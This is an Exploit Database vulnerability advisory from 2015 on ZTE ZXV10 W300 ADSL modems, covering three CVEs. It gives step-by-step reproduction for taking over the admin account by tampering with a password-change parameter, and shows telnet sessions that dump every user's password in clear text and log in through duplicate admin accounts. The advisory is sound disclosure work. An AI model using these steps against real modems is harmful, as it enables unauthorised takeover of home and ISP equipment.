ZTE ADSL ZXV10 W300 Modems – Multiple Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： Karn Ganeshen
  日期： 2015-11-20
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/38772/

• # Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]
  # Discovered by: Karn Ganeshen
  # Vendor Homepage: [www.zte.com.cn]
  # Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]
  
  *CVE-ID*:
  CVE-2015-7257
  CVE-2015-7258
  CVE-2015-7259
  
  *Note*: Large deployment size, primarily in Peru, used by TdP.
  
  1 *Insufficient authorization controls*
  *CVE-ID*: CVE-2015-7257
  Observed in Password Change functionality. Other functions may be
  vulnerable as well.
  
  *Expected behavior:*
  Only administrative 'admin' user should be able to change password for all
  the device users. 'support' is a diagnostic user with restricted
  privileges. It can change only its own password.
  
  *Vulnerability:*
  Any non-admin user can change 'admin' password.
  
  *Steps to reproduce:*
  a. Login as user 'support' password XXX
  b. Access Password Change page - http://<IP>/password.htm
  c. Submit request
  d. Intercept and Tamper the parameter ­ username ­ change from 'support' to
  'admin'
  e. Enter the new password ­> old password is not requested ­> Submit
  > Login as admin
  -> Pwn!
  
  
  2 *Sensitive information disclosure - clear-text passwords*
  *CVE-ID*: CVE-2015-7258
  Displaying user information over Telnet connection, shows all valid users
  and their passwords in clear­-text.
  
  *Steps to reproduce:*
  $ telnet <IP>
  Trying <IP>...
  Connected to <IP>.
  Escape character is '^]'.
  User Access Verification
  Username: admin
  Password: <­­­ admin/XXX1
  
  $sh
  ADSL#login show <--­­­ shows user information
  Username Password Priority
  adminpassword1 2
  supportpassword2 0
  admin password3 1
  
  3 *(Potential) Backdoor account feature - **insecure account management*
  *CVE-ID*: CVE-2015-7259
  Same login account can exist on the device, multiple times, each with
  different priority#. It is possible to log in to device with either of the
  username/password combination.
  
  It is considered as a (redundant) login support *feature*.
  
  *Steps to reproduce:*
  $ telnet <IP>
  Trying <IP>...
  Connected to <IP>.
  Escape character is '^]'.
  User Access Verification
  User Access Verification
  Username: admin
  Password: <­--­­ admin/password3
  
  $sh
  ADSL#login show
  UsernamePasswordPriority
  adminpassword12
  supportpassword20
  adminpassword31
  
  +++++
  -- 
  Best Regards,
  Karn Ganeshen